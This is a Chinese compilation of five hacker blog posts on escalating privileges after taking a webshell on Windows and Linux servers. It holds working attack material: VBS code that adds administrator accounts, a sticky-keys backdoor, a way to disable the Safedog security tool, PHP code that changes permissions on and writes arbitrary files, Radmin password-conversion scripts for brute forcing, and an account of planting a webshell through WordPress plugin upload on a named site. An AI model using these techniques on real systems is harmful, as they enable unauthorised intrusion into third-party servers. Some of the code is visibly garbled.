今天小编在这给大家整理了记一次WEBSHELL提权,本文共5篇,我们一起来阅读吧!
篇1:记一次WEBSHELL提权
目标站点:www.xxx.com
今天闲的 ..看到群里发了一个站. 无聊 就去搞下..
怎么拿下shell就不多说了..
主要说如何提权的..给大家一个思路..
拿到shell,像往常一样 先看了下组建支持
从上图我们可以看到.权限还是挺大的.可以执行命令
然后看了下支持不支持ASPX. 我一般喜欢用ASPX的马搞..
很幸运.支持ASPX.
上了ASPX大马之后.找到了C:\\RECYCLER\\这个目录有可读可写权限.
于是呼.上传CMD.EXE
随手打了个whoami
权限不大,,直接上传个巴西烤肉
从上图看到 运行巴西烤肉 提示拒绝访问.估计服务器装了杀软..后缀改了下.还是拒绝访问.
然后又上传了各种EXP都是拒绝访问..当时就蛋碎了一地.
想了下 算了 先看看开放了什么端口吧.
55555就是终端端口了,..我惊喜的发现了65500端口 记得以前65500出现过漏洞默认帐号go
默认密码od
打开FTP.连接65500看看有没有这个漏洞
竟然登陆上去了,看来管理员的安全意识还是有点差啊.
那就试试看这个可以提权不,
用户已经添加上去了..然后添加到管理组OK 也添加成功了 我们登陆看看帐户是否被添加上好了 教程结束
篇2:记一次突破安全狗提权
,。果断丢御剑。
FCK编辑器拿shell还是比较简单的,直接二次上传。。
拿到shell之后看了一下,权限还是很大的,于是乎准备提权。先看下组件。
wscript.shell被删了。看下脚本探测。一看支持aspx ,果断换马。接着上传了个cmd到C:\\RECYCLER。。看看能不能执行命令、
可以执行命令。 ww. 但是net user却没回显,应该是net被禁用了、、果断上传ms11080。
成功添加用户。。但是连接的时候却这样
果断试下第二种方法。。把下面代码保存为1.vbs
Set o=CreateObject( “Shell.Users” )
Set z=o.create(“user”)
z.changePassword “12345”,“”
z.setting(“AccountType”)=3
然后以system权限运行,
。会添加一个用户user密码为12345、、
成功执行。。但是还是不行。。
估计是第三方软件阻止了。果断tasklist。。
原来有安全狗。。
试了下远控无果。。
于是准备劫持shift后门、、直接替换sethc。。
连接看看。。5下shift。没看到后门。
于是看了下进程。。发现是、、
果断替换MY_sethc。。5下shift。如图。
果断登录上去加用户。。无果
打开安全狗。。看下,被拦截了。
果断关闭帐号防护。因为net被禁用了,所以直接运行ms11080或1.vbs成功添加用户。如图。
篇3:linux提权之跨目录访问拿webshell代码
linux主机的权限设置一般情况下都很松散,少有的一些还是不能直接跨目录访问,
在linux不能提权的情况下,可以试试这些代码来跨目录试试。
第一个exp代码:
PHP代码
$path= stripslashes($_GET['path']);
$ok= chmod ($path, 0777);
if ($ok== true)
echo CHMOD OK , Permission editable file or directory. Permission to write;
?>
把以上代码保存为pahuai.com.PHP
访问www.ckpis.com/pahuai.com.php?path=../../要跨的目录/index.php
这里的index.PHP是要修改权限的文件。
第二个exp代码:
PHP代码
@$filename= stripslashes($_POST['filename']);
@$mess= stripslashes($_POST['mess']);
$fp= @fopen({$_POST['filename']}, 'a');
@fputs($fp,$mess
@fclose($fp);
?>
CODE :
Changing CHMOD Permissions Exploit – Contact : the_gl4di4t0r[AT]hotmail[DOT]com
把代码保存为ckpis.com.php注意代码中的路径,
用的时候要改成访问的目录和文件。
篇4:Radmin软件的一次提权技巧
最近做渗透测试时常碰到RADMIN一类的东西..
一碰到此类的程序,一般我都会先看下对方把RADMIN的端口配置成什么..以及相应的PASS(加密过的)
HKEY_LOCAL_MACHINE\\SYSTEM\\RAdmin\\v2.0\\Server\\Parameters\\Parameter //默认密码注册表位置
HKEY_LOCAL_MACHINE\\SYSTEM\\RAdmin\\v2.0\\Server\\Parameters\\Port //默认端口注册表位置
//把海阳读出来的,用逗号格开,然后用下面的代码转换就可以了
CODE:
[Copy to clipboard]
Dim theStr
theStr = InputBox( “请输入要转换的密码:”, “输入”, “44,41,43,32,43,5,45,64,43,24,31,53,46,57,64,86” )
If theStr “” Then
Call InputBox(“请复制已经转换好的密码”,,zpass(theStr))
End If
Function zpass(pass)
tpass=“”
MyArray = Split(pass, “,”, -1, 1)
For each thepass in MyArray
if len(thepass) = 1 then
tpass=tpass+“0”
end if
tpass=tpass+hex(thepass)
Next
zpass=tpass
End Function
//转换后的,就可以拿爆破工具去跑了....
端口读出后类似这样 223,34,0,0
//用下面代码转换即可
CODE:
[Copy to clipboard]
Dim theStr
theStr = InputBox( “请输入要转换的端口:”, “输入”, “223,34,0,0,” )
da = Split(thestr, “,”, -1, 1)
If theStr “” Then
Call InputBox(“请复制已经转换好的端口”,,Hex2Dec(Dec2Hex(da(3))&Dec2Hex(da(2))&Dec2Hex(da(1))&Dec2Hex(da(0))))
End If
Function Hex2Dec(Hex)
Hex = UCase(Hex)
For i = 1 To Len(Hex)
Select Case Mid(Hex, Len(Hex) - i + 1, 1)
Case “0”: B = B + 16 ^ (i - 1) * 0
Case “1”: B = B + 16 ^ (i - 1) * 1
Case “2”: B = B + 16 ^ (i - 1) * 2
Case “3”: B = B + 16 ^ (i - 1) * 3
Case “4”: B = B + 16 ^ (i - 1) * 4
Case “5”: B = B + 16 ^ (i - 1) * 5
Case “6”: B = B + 16 ^ (i - 1) * 6
Case “7”: B = B + 16 ^ (i - 1) * 7
Case “8”: B = B + 16 ^ (i - 1) * 8
Case “9”: B = B + 16 ^ (i - 1) * 9
Case “A”: B = B + 16 ^ (i - 1) * 10
Case “B”: B = B + 16 ^ (i - 1) * 11
Case “C”: B = B + 16 ^ (i - 1) * 12
Case “D”: B = B + 16 ^ (i - 1) * 13
Case “E”: B = B + 16 ^ (i - 1) * 14
Case “F”: B = B + 16 ^ (i - 1) * 15
End Select
Next
Hex2Dec = B
End Function
Function Dec2Hex(Dec)
Dec2Hex = “”
Do While Dec >0
a = CStr(Dec Mod 16)
Select Case a
Case “10”: a = “A”
Case “11”: a = “B”
Case “12”: a = “C”
Case “13”: a = “D”
Case “14”: a = “E”
Case “15”: a = “F”
End Select
Dec2Hex = a & Dec2Hex
Dec = Dec \\ 16
Loop
End Function
篇5:记一次WordPress后台取webshell的方法
弄了一台数据库服务器,是虚拟主机的,
里面有不少WordPress网站的数据库。但是看样子,应该是数据库服务器和网站服务器分离。所以研究了一下WordPress的网站。去网上搜索了一下,似乎现在网上流传的漏洞WordPress官方都更新掉了。所以自己研究了一下(以前没研究过WordPress)
以网站:free2styler.co.uk/
为例来说一下我是怎么拿到webshell的。既然已经有了数据库,就算是网站跟数据库不是一台服务器,其他的一切也都很好办了(我是这么觉得)。
看了下WordPress的密码加密方式,我在本地跑了一下。
按照如下信息添加管理员:
free2styler.co.uk/wp-admin/
使用用户名为silic密码:blackbap.org登录既可
按照网上说的,在后台媒体上传部分上传php后缀的webshell,显然是失败了,
提示文件类似不允许
寻找了一通,发现安装插件那里有点意思
我首先将webshell打包,格式为zip(其余的什么也不用加,就一个webshell就可以了)
上传后,发现系统出现错误回显:
这些错误回显直接无视掉。原先的webshell是:best.php打包后叫best.zip
那么访问:
free2styler.co.uk/wp-content/plugins/best/best.php
就得到了webshell的地址了
作者:YoCo Smart
来自:习科信息技术 Silic Group Hacker Army
文档为doc格式